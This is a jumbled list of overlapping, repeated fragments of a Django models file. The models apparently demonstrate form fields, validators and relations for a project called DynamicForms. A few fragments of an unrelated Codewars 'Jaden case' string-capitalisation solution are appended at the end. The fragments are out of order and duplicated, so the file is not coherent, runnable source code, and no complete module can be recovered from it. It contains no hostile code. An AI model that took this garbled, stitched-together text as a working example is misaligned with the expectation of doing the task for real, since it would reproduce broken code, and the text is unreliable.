"field so you will need to override it in form ('A', 'A'), ('B',",
"field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit",
"comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility \"\"\"",
"changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide unit field')",
"# string_related_field, which is always read_only is defined only in serializer # and",
"1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2,",
"in HTML forms in DRF\"\"\" # list_field = models.? # dict_field = models.?",
"in serializer # and primary_key_related_field is defined as its source primary_key_related_field = models.OneToOneField(",
"'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True,",
"options A-C may be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model):",
"field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields in",
"ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True)",
"related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField(",
"will need to override it in form ('A', 'A'), ('B', 'B'), ('C', 'C'),",
"> timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported in HTML forms in",
"unit field') unit = models.CharField(max_length=10, choices=( (None, 'No additional data'), ('pcs', 'Pieces'), ('wt',",
"code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two characters,",
"Shows basic available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field =",
"models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2)",
"= models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field = models.IntegerField(null=True) nullint_field =",
"= models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field =",
"slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related'",
"2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field",
"blank=True, validators=[ # This one should be interesting: will a blank value pass",
"# json_field = models.JSONField() # serializer_method_field = models.? # model_field = models.? #",
"= models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True)",
"available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field",
"verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model):",
"something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading of many records",
"null=True, blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that",
"you will need to override it in form ('A', 'A'), ('B', 'B'), ('C',",
"with two characters, followed by up to 8 numbers') ]) enabled = models.BooleanField()",
"Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay",
"1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\"",
"fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field =",
"(3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field with choices') bool_field =",
"models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True)",
"validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting",
"filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True)",
"(2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows",
"verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms",
"# Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1,",
"'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how",
"null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a decimal",
"use a decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter",
"\"\"\" Shows advanced available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field =",
"on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\"",
"chosen', 'regex') ]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing",
"= models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals())",
"help_text='Now that you have shown me, please enter something') class PageLoad(models.Model): \"\"\" Shows",
"'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex') ]) comment",
"for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now() -",
"supported in HTML forms in DRF\"\"\" # list_field = models.? # dict_field =",
"django.db import models from django.utils import timezone class Validated(models.Model): \"\"\" Shows validation capabilities",
"pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number,",
"primary_key_related_field is defined as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary'",
"AdvancedFields model \"\"\" name = models.CharField(max_length=16) def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\"",
"hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field",
"blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a decimal point",
"datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field",
"models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available",
"models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),),",
"models.ImageField(upload_to='examples/', null=True, blank=True) # Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def",
"models.CharField(max_length=4, blank=True, choices=( # this one will be a multi-choice field so you",
"DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32)",
"readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported in",
"description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False,",
"a multi-choice field so you will need to override it in form ('A',",
"item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'), (3,",
"# serializer_method_field = models.? # model_field = models.? # Relations # string_related_field, which",
"models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field =",
") def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms",
"'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex')",
"help_text='Fell free to use a decimal point / comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment',",
"multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two",
"models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True)",
"1'), (1, 'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'), )) item_flags =",
"will be a multi-choice field so you will need to override it in",
"models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field",
"RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two characters, followed by up to",
"'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean",
"max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True,",
"= models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/', null=True, blank=True) file_field_two =",
"= models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field = models.FileField(upload_to='examples/',",
") hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced",
"(3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( # this one will",
"not supported in HTML forms in DRF\"\"\" # list_field = models.? # dict_field",
"\"\"\"ListField and DictField not supported in HTML forms in DRF\"\"\" # list_field =",
"override it in form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ),",
"and primary_key_related_field is defined as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True,",
"blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field",
"qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a decimal point /",
"blank=True, help_text='Fell free to use a decimal point / comma') cst_fld = models.CharField(max_length=80,",
"blank value pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit",
"\"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two",
"null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers \"\"\" char_field",
"= models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field",
"boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field =",
"DictField not supported in HTML forms in DRF\"\"\" # list_field = models.? #",
"models.? # Relations # string_related_field, which is always read_only is defined only in",
"of many records in ViewSet result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice",
"max_length=32) class Relation(models.Model): \"\"\" Model related to AdvancedFields model \"\"\" name = models.CharField(max_length=16)",
"# model_field = models.? # Relations # string_related_field, which is always read_only is",
"advanced available fields in DynamicForms \"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8)",
"dynamically changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide unit",
"capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with",
"'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer field with choices')",
"additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld =",
"3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( # this one",
"dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field = models.JSONField() #",
"with choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name",
"= models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3,",
"hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity'",
"Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field =",
"blank=True) # Model attribute for ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return",
"blank=True) file_field_two = models.FileField(upload_to='examples2/', null=True, blank=True) image_field = models.ImageField(upload_to='examples/', null=True, blank=True) # Model",
"for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field = models.? # model_field =",
"json_field = models.JSONField() # serializer_method_field = models.? # model_field = models.? # Relations",
"is defined as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' )",
"models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField",
"'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld =",
"datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True) password_field",
"= models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field =",
"choices=( # this one will be a multi-choice field so you will need",
"\"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit = models.CharField(max_length=10,",
"# This one should be interesting: will a blank value pass the Min",
"models from django.utils import timezone class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code",
"32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice 3'),",
"hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField",
"timedelta(days=1) \"\"\"ListField and DictField not supported in HTML forms in DRF\"\"\" # list_field",
"\"\"\" regex_field = models.CharField(max_length=256) choice_field = models.CharField(null=True, max_length=8) single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field",
") hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True,",
"decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field =",
"BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False)",
"class Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please",
"Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice",
"int_field = models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1,",
"'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'),), help_text='Integer field with choices', verbose_name='Integer",
"class BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False,",
"available only for PostgreSQL\"\"\" # json_field = models.JSONField() # serializer_method_field = models.? #",
"defined as its source primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field",
"]) comment = models.TextField(null=True, blank=True) class HiddenFields(models.Model): \"\"\" Shows dynamically changing field visibility",
"starting with two characters, followed by up to 8 numbers') ]) enabled =",
"integer_field = models.IntegerField(null=True) nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True,",
"= models.? # dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\" # json_field",
"'Choice 2'), (2, 'Choice 3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True,",
"django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from django.utils import timezone",
"models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use a",
"me, please enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading",
"Shows how DynamicForms handles dynamic loading of many records in ViewSet result \"\"\"",
"Shows how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field')",
"models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice",
"('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may",
"Relation, on_delete=models.CASCADE, null=True, related_name='hyper_identity' ) def __str__(self): return 'Advanced field {self.id}'.format(**locals()) class RefreshType(models.Model):",
"from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from django.utils import",
"(3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles",
"ReadOnlyField hidden_field = models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1)",
"self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported in HTML forms",
"= models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to use",
"single_choice_field = models.CharField(null=True, max_length=8) multiplechoice_field = models.CharField(null=True, max_length=8) filepath_field = models.FilePathField(null=True) file_field =",
"\"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field",
"primary_key_related_field = models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE,",
"comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text =",
"timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported in HTML forms in DRF\"\"\"",
"list_field = models.? # dict_field = models.? \"\"\"JSONField available only for PostgreSQL\"\"\" #",
"validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask. 1=apartment_number, ..., 32=delay item_type",
"additional info here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown",
"handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime",
"2'), (2, 'Choice 3'), (3, 'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=(",
"choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False,",
"'No additional data'), ('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld",
"max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True)",
"]) enabled = models.BooleanField() amount = models.IntegerField(null=True, blank=True, validators=[ # This one should",
"verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20,",
"return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported in HTML",
"models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field",
"a string starting with two characters, followed by up to 8 numbers') ])",
"), validators=[ RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex') ]) comment =",
"handles different refresh types \"\"\" description = models.CharField(max_length=20, help_text='Item description') rich_text_field = models.TextField(blank=True,",
"basic available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True)",
"help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields",
"('pcs', 'Pieces'), ('wt', 'Weight'), ('cst', 'Custom'), ), null=True, blank=True) int_fld = models.IntegerField(verbose_name='Quantity', null=True,",
"value pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) # Bit mask.",
"nullint_field = models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field",
"int_fld = models.IntegerField(verbose_name='Quantity', null=True, blank=True) qty_fld = models.FloatField(verbose_name='Weight', null=True, blank=True, help_text='Fell free to",
"= models.DateTimeField(default=timezone.now) @property def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and",
"Validated(models.Model): \"\"\" Shows validation capabilities \"\"\" code = models.CharField(max_length=10, validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter",
"read_only is defined only in serializer # and primary_key_related_field is defined as its",
"self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms \"\"\" regex_field =",
"/ comma') cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text",
"models.IntegerField(null=True, blank=True) float_field = models.FloatField(null=True) decimal_field = models.DecimalField(null=True, max_digits=5, decimal_places=2) datetime_field = models.DateTimeField(null=True)",
"one will be a multi-choice field so you will need to override it",
"models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True)",
"result \"\"\" description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2,",
"RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh types \"\"\" description = models.CharField(max_length=20,",
"= models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field",
"{self.id}'.format(**locals()) class RefreshType(models.Model): \"\"\" Shows how DynamicForms handles different refresh types \"\"\" description",
"'Choice 1'), (2, 'Choice 2'), (3, 'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model):",
"slug_field = models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field",
"in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field = models.CharField(null=True,",
"on_delete=models.CASCADE, null=True, related_name='slug' ) hyperlinked_related_field = models.ManyToManyField( Relation, related_name='hyper_related' ) hyperlinked_identity_field = models.ForeignKey(",
"visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to hide unit field') unit =",
"'Choice 4'), )) item_flags = models.CharField(max_length=4, blank=True, choices=( # this one will be",
"null=True, blank=True, help_text='Fell free to use a decimal point / comma') cst_fld =",
"validators=[ RegexValidator(r'\\w\\w\\d+', 'Please enter a string starting with two characters, followed by up",
"available fields in DynamicForms \"\"\" boolean_field = models.BooleanField(null=False, default=False) nullboolean_field = models.BooleanField(null=True) char_field",
"def __str__(self): return self.name class AdvancedFields(models.Model): \"\"\" Shows advanced available fields in DynamicForms",
"RegexValidator(r'^[ABC]*$', 'Only options A-C may be chosen', 'regex') ]) comment = models.TextField(null=True, blank=True)",
"amount = models.IntegerField(null=True, blank=True, validators=[ # This one should be interesting: will a",
"models.OneToOneField( Relation, on_delete=models.CASCADE, null=True, related_name='primary' ) slug_related_field = models.ForeignKey( Relation, on_delete=models.CASCADE, null=True, related_name='slug'",
"<gh_stars>10-100 from datetime import timedelta from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db",
"DynamicForms handles dynamic loading of many records in ViewSet result \"\"\" description =",
"duration_field = models.DurationField(null=True) password_field = models.CharField(null=True, max_length=32) class Relation(models.Model): \"\"\" Model related to",
"description = models.CharField(max_length=20, help_text='Item description') choice = models.IntegerField(choices=((1, 'Choice 1'), (2, 'Choice 2'),",
"field') name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\"",
"= models.SlugField(null=True) url_field = models.URLField(null=True) uuid_field = models.UUIDField(null=True) ipaddress_field = models.GenericIPAddressField(null=True) integer_field =",
"import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from django.utils import timezone class",
"models.IntegerField(help_text='Integer field', verbose_name='Integer field') int_choice_field = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'),",
"help_text='Char field', verbose_name='Char field') datetime_field = models.DateTimeField(help_text='Datetime field', verbose_name='Datetime field') int_field = models.IntegerField(help_text='Integer",
"models.BooleanField(null=True) char_field = models.CharField(null=True, max_length=32) email_field = models.EmailField(null=True) slug_field = models.SlugField(null=True) url_field =",
"choices', verbose_name='Integer field with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name =",
"# Relations # string_related_field, which is always read_only is defined only in serializer",
"# this one will be a multi-choice field so you will need to",
"to override it in form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'),",
"string_related_field, which is always read_only is defined only in serializer # and primary_key_related_field",
"with choices') bool_field = models.BooleanField(help_text='Boolean field', verbose_name='Boolean field') name = models.CharField(max_length=20, help_text='Name field',",
"name = models.CharField(max_length=20, help_text='Name field', verbose_name='Name field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows",
"cst_fld = models.CharField(max_length=80, verbose_name='Comment', null=True, blank=True, help_text='Enter additional info here') additional_text = models.CharField(max_length=80,",
"here') additional_text = models.CharField(max_length=80, null=True, blank=True, help_text='Now that you have shown me, please",
"\"\"\" Shows dynamically changing field visibility \"\"\" note = models.CharField(max_length=20, help_text='Enter abc to",
"def readonly_field(self): return self.hidden_field > timezone.now() - timedelta(days=1) \"\"\"ListField and DictField not supported",
"enter something') class PageLoad(models.Model): \"\"\" Shows how DynamicForms handles dynamic loading of many",
"a blank value pass the Min validator? It should! MinValueValidator(5), MaxValueValidator(10) ]) #",
"item_flags = models.CharField(max_length=4, blank=True, choices=( # this one will be a multi-choice field",
"'Choice 3')), null=False, blank=False, default=1) class Filter(models.Model): \"\"\" Shows how DynamicForms handles filers",
"]) # Bit mask. 1=apartment_number, ..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'),",
"how DynamicForms handles filers \"\"\" char_field = models.CharField(max_length=20, help_text='Char field', verbose_name='Char field') datetime_field",
"field', null=True, blank=True) class BasicFields(models.Model): \"\"\" Shows basic available fields in DynamicForms \"\"\"",
"..., 32=delay item_type = models.IntegerField(choices=( (0, 'Choice 1'), (1, 'Choice 2'), (2, 'Choice",
"= models.CharField(max_length=4, blank=True, choices=( # this one will be a multi-choice field so",
"form ('A', 'A'), ('B', 'B'), ('C', 'C'), ('D', 'D'), ), validators=[ RegexValidator(r'^[ABC]*$', 'Only",
"timedelta from django.core.validators import MaxValueValidator, MinValueValidator, RegexValidator from django.db import models from django.utils",
"decimal_places=2) datetime_field = models.DateTimeField(null=True) date_field = models.DateField(null=True) time_field = models.TimeField(null=True) duration_field = models.DurationField(null=True)"
] |
[
"\"\"\" return ' '.join([word.capitalize() for word in string.split()]) def to_jaden_case2(string_input: str) -> str:",
"def to_jaden_case(string: str) -> str: \"\"\" My implementation \"\"\" return ' '.join([word.capitalize() for",
"str) -> str: \"\"\" My implementation \"\"\" return ' '.join([word.capitalize() for word in",
"can mirrors be real if our eyes aren't real\")) print(to_jaden_case2(\"How can mirrors be",
"Not Jaden-Cased: \"How can mirrors be real if our eyes aren't real\" Jaden-Cased:",
"\"\"\" My implementation \"\"\" return ' '.join([word.capitalize() for word in string.split()]) def to_jaden_case2(string_input:",
"mirrors be real if our eyes aren't real\" Jaden-Cased: \"How Can Mirrors Be",
"string.capwords() is handy. \"\"\" return string.capwords(string_input) print(to_jaden_case(\"How can mirrors be real if our",
"is capitalized Example: Not Jaden-Cased: \"How can mirrors be real if our eyes",
"our eyes aren't real\")) print(to_jaden_case2(\"How can mirrors be real if our eyes aren't",
"return ' '.join([word.capitalize() for word in string.split()]) def to_jaden_case2(string_input: str) -> str: \"\"\"",
"person's version. string.capwords() is handy. \"\"\" return string.capwords(string_input) print(to_jaden_case(\"How can mirrors be real",
"return string.capwords(string_input) print(to_jaden_case(\"How can mirrors be real if our eyes aren't real\")) print(to_jaden_case2(\"How",
"is handy. \"\"\" return string.capwords(string_input) print(to_jaden_case(\"How can mirrors be real if our eyes",
"string in which each word is capitalized Example: Not Jaden-Cased: \"How can mirrors",
"Jaden-Cased: \"How can mirrors be real if our eyes aren't real\" Jaden-Cased: \"How",
"import string def to_jaden_case(string: str) -> str: \"\"\" My implementation \"\"\" return '",
"'.join([word.capitalize() for word in string.split()]) def to_jaden_case2(string_input: str) -> str: \"\"\" Another person's",
"\"\"\" https://www.codewars.com/kata/5390bac347d09b7da40006f6 Given a string, return a string in which each word is",
"to_jaden_case(string: str) -> str: \"\"\" My implementation \"\"\" return ' '.join([word.capitalize() for word",
